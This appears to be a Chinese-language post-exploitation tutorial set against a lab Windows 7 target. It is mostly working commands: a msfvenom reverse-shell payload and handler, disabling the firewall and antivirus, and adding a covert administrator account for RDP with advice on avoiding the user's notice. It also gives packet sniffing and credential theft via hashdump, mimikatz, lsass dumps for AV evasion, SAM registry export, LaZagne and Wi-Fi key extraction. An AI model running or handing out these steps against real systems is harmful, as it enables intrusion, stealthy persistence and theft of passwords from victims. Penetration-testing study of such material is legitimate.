目录
Metasploit内网信息收集
01msf反弹shell
02msf反弹shell
03通过shell关闭防火墙
04关闭杀毒软件
05打开并连接3389
06数据包抓取
07口令破解
普通用户提权
08other
09scraper
09winenum
10msf主机发现
11msf端口扫描
12服务扫描与查点
凭证信息收集
01凭证获取工具
02密码hash
03mimikatz
04get-hashs
05wce
06pwddump7
07ophcrack
08Procdump+Mimikatz (常用免杀)
09注册表导出hash
10lazagne
本地信息收集
01IE浏览器代理信息查看
02Windows Wifi密码获取
03Windows hosts config
04Windows IIS config
05Windows回收站信息获取
06Chorme的密码和cookie获取
07Windows日志信息查看
Metasploit内网信息收集
攻击机 kali 192.168.0.103
靶机 win7 192.168.0.105
01msf反弹shell
首先生成一个payload
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.103 LPORT=4444 -f exe > shell.exe
02msf反弹shell
配置反弹会话处理程序
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.103
set lport 4444
exploit
将payload发送到目标机器让其执行
执行成功
linux无法识别window汉字会乱码,修改一下代码页(65001代表的是UTF-8)
03通过shell关闭防火墙
shell(execute -f cmd -i -H)
netsh advfirewall set allprofiles state off (关闭防火墙)
netsh advfirewall show allprofiles (查看防火墙状况)
通过策略添加防火墙规则隐蔽行为
netsh advfirewall set add rule name= "VMWARE" protocol=TCP dir=in localport=4444 action=allow
netsh firewall add portopening TCP 4444 "VMWARE" ENABLE ALL
重启生效(令win7重启):
shutdown -r -f -t 0
04关闭杀毒软件
关闭windefend
net stop windefend
关闭杀毒软件
run killav
run post/windows/manage/killav
05打开并连接3389
查看3389端口的开放情况
开启3389远程桌面
run post/windows/manage/enable_rdp
run getgui -e
可以利用该命令在目标机器上添加用户:
run getgui -u admin -p Admin@123456(一些系统密码得满足复杂度才能创建)
net localgroup administrators admin /add(将admin用户添加到管理员组)
远程连接桌面
rdesktop -u username -p password ip
yes之后会弹出一个GUI页面(如果用户没有添加到管理员组不能进行登录)
登陆后会提示关闭win7(所以要提前观察靶机是否有人使用,以免被用户察觉到被攻击)
查看远程桌面
screenshot(截取win7当前屏幕,检查是否有人使用)
use espia
screengrab
screenshare(实时获取win7屏幕,类似于视频样式在浏览器中打开)
删除指定账号
run post/windows/manage/delete_user USERNAME=admin
06数据包抓取
抓包
Load sniffer
Sniffer_interfaces
Sniffer_start 2
Sniffer_dump 2 1.cap
解码
Use auxiliary/sniffer/psnuffle
Set PCAPFILE 1.cap
exploit
07口令破解
use post/windows/gather/hashdump //system权限的meterpreter
set session 1
exploit //结果保存在tmp目录下
use post/windows/gather/smart_hashdump
set session 1
exploit
格式
用户名称:RID:LM-HASH值:NT-HASH值
rid是windows系统账户对应固定的值,类似于linux的uid,gid号,500为administartor,501为guest等。而lm-hash和nt-hash,他们都是对用户密码进行的加密,只不过加密方式不同
hashdump使用的是mimikatz的部分功能
load mimikatz
wdigest、kerberos、msv、ssp、tspkg、livessp
mimikatz_command -h
mimikatz_command -f a:: //查询有哪些模块
mimikatz_command -f samdump::hashes
mimikatz_command -f samdump::bootkey
普通用户提权
getuid
查看用户权限
hashdump
需要管理员的权限
getsystem
只是表面上获取了管理员权限,并没有拥有一些真正的管理员权限
ps
查看进程
getpid
查看当前进程
migrate
进程迁移(把普通用户进程迁移到管理员用户的进程上)
hashdump
08other
确定目标主机是否是虚拟机:
run checkvm
获取目标主机上的软件安装信息:
run post/windows/gather/enum_applications
获取目标主机上最近访问过的文档、链接信息:
run post/windows/gather/dumplinks
查看目标环境信息:
run post/windows/gather/env
查看firefox中存储的账号密码:
run post/windows/gather/firefox_creds
查看ssh账号密码的密文信息、证书信息:
run post/windows/gather/ssh_creds
09scraper
run scraper(将目标机器上的常见信息收集起来然后下载保存在本地)
/root/.msf4/logs/scripts/scraper
09winenum
run winenum(收集一些当前系统,用户组相关的信息)
/root/.msf4/logs/scripts/winenum
10msf主机发现
模块位于源码路径的modules/auxiliary/scanner/discovery/
主要有:
arp_sweep
ipv6_mulitcast_ping
ipv6_neighbor
ipv6_neighbor_router_advertisement
udp_probe
udp_sweep
11msf端口扫描
msf> search portscan
auxiliary/scanner/portscan/ack //通过ACK扫描的方式对防火墙上未被屏蔽的端口进行探测
auxiliary/scanner/portscan/ftpbounce //通过FTP bounce攻击的原理对TCP服务进行枚举,一些新的软件能很好的防范此攻击,但在旧的系统上仍可以被利用
auxiliary/scanner/portscan/syn //使用发送TCP SYN标志的方式探测开放端口
auxiliary/scanner/portscan/tcp //通过一次完整的TCP连接来判断端口是否开放,最准确但是最慢
auxiliary/scanner/portscan/xmas //一种更为隐秘的扫描方式,通过发送FIN·PSH·URG标志,能够躲避一些高级的TCP标记检测器的过滤
一般情况下推荐使用syn端口扫描器·速度较快·结果准确·不容易被对方察觉
syn扫描器的使用
use auxiliary/scanner/portscan/syn
set rhosts 192.168.0.105/24
set threads 20
exploit
12服务扫描与查点
确定开放端口后,对相应端口上所运行的服务信息进行挖掘
在Metasploit的Scanner辅助模块中,用于服务扫描和查点的工具常以[service_name]_version和[service_name]_login命名
[service_name]_version 可用于遍历网络中包含了某种服务的主机,并进一步确定服务的版本
[service_name]_login 可对某种服务进行口令探测攻击
在msf终端中可以输入
search name:_version
查看所有可用的服务查点模块
凭证信息收集
01凭证获取工具
常用来获取windows密码的工具
- mimikatz
- wce
- pwddump7
- ophcrack
- procdump+mimikatz
- lazagne
02密码hash
LM哈希&NTLM型哈希
winodws hash:
| 2000 | xp | 2003 | Vista | win7 | 2008 | 2012 | |
| LM | √ | √ | √ | ||||
| NTLM | √ | √ | √ | √ | √ | √ | √ |
windows本地hash:
http://www.secpulse/archives/65256.html
windows系统下hash密码格式:
用户名称:RID:LM-HASH值:NT-HASH值
03mimikatz
mimikatz下载:
链接:https://pan.baidu/s/1ZbQM5YrgNyqmHFWBySSJjg
提取码:jryu
非本地交互式凭证获取
mimikatz.exe "log res.txt" "privilege::debug" "token::elevate" "lsadump::sam" "exit"
mimikatz.exe "log logon.txt" "privilege::debug" "sekurlsa::logonpasswords" "exit"
一般都是通过远程登陆靶机,在靶机内下载mimikatz
log result.txt(将结果传到txt中)
privilege::debug(提权)
token::elevate(模拟令牌:用于将权限提升为SYSTEM (默认)或在框中找到域管理员令牌)
获取到system用户的token
lsadump::sam(获得用户哈希)
sekurlsa::logonpasswords(获取明文密码)
mimikatz1.x版本:
privilege::debug //提升权限
inject::process lsass.exe sekurlsa.dll //注入sekurlsa.dll到lsass.exe进程里
@getLogonPasswords //获取密码
mimikatz免杀:
https://www.freebuf/articles/system/234365.html
04get-hashs
05wce
WCE:windows credentials editor
WCE是跟mimikatz齐名的一款hash管理工具
官网地址:https://www.ampliasecurity/research.html
32位下载:https://www.ampliasecurity/research/wce_v1_42beta_x32.zip
64位下载:https://www.ampliasecurity/research/wce_v1_42beta_x64.zip
历史版本下载:https://www.ampliasecurity/research/windows-credentials-editor/
WCE使用说明:
wce.exe -l(获取用户哈希)
wce.exe -w(获取用户明文密码)
06pwddump7
这款工具可以读取出当前系统的各个用户的密码hash(包括LM和NTLM)
在命令行输入Pwddump7.txt就可以读取出hash并显示出来,也可以保存到一个文件中
07ophcrack
如果网站无法破解出hash值,我们可以使用ophcrack工具配合彩虹表自己破解。
工具下载:https://ophcrack.sourceforge.io/
彩虹表:
https://ophcrack.sourceforge.io/tables.php
http://project-rainbowcrack/table.htm
08Procdump+Mimikatz (常用免杀)
Procdump下载: https://docs.microsoft/zh-cn/sysinternals/downloads/procdump
Procdump lsass 进程导出:
For 32bits:procdump.exe -accepteula -ma lsass.exe lsass.dmp
For 64bits:procdump.exe -accepteula -64 -ma lsass.exe lsass.dmp
然后使用mimikatz还原密码:
sekurlsa::minidump lsass.dmp
sekurlsa::logonPasswords full
09注册表导出hash
reg save HKLM\SYSTEM system.hiv
reg save HKLM\SAM sam.hiv
reg save HKLM\SECURITY security.hiv
导出后可以使用cain导入system.hiv、security.hiv获取缓存中的明文信息。
mimikatz.exe “lsadump::sam /system:system.hiv /sam:sam.hiv” exit
python secretsdump.py -sam sam.hiv -security security.hiv -system system.hiv LOCAL
10lazagne
LaZagne 是用于获取存储在本地计算机上的大量密码的开源应用程序。 每个软件都使用不同的技术(纯文本、API、自定义算法、数据库等)存储其密码。LaZagne 的作用就是找到最常用的一些软件的密码。 LaZagne 几乎支持市面上大部分常用工具。包括浏览器、Git、SVN、Wifi、Databases 等。但是对聊天软件的支持不够本土化,主要支持一些国外的聊天软件。
抓取所有支持软件的密码:
lazagne.exe all
本地信息收集
01IE浏览器代理信息查看
reg query "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings"
02Windows Wifi密码获取
netsh wlan show profile
netsh wlan show profile name="ssid" KEY=clear
03Windows hosts config
windows7/windows2008/windows10等:
C:\Windows\System32\drivers\etc\hosts
Windows2003:
C:\WINDOWS\SYSTEM32\DRIVERS\ETC\HOSTS
04Windows IIS config
IIS6:
cscript.exe C:\Inetpub\AdminScripts\adsutil.vbs ENUM W3SVC/1/root
IIS7,8:
列出网站列表:%systemroot%/system32/inetsrv/appcmd.exe list site
列出网站物理路径:%systemroot%\system32\inetsrc\appcmd.exe list vdir
Mimikatz读取IIS7配置文件密码:
mimikatz.exe privilege::debug log "iis::apphost
/in:"%systemroot%\system32\inetsrv\config\applicationHost.config" /live" exit
05Windows回收站信息获取
目录路径在C:\%Recycle.Bin
$I开头的文件保存的是路径信息
$R开头的文件保存的是文件内容
06Chorme的密码和cookie获取
07Windows日志信息查看
更多推荐
内网渗透之内网信息收集(综合)
发布评论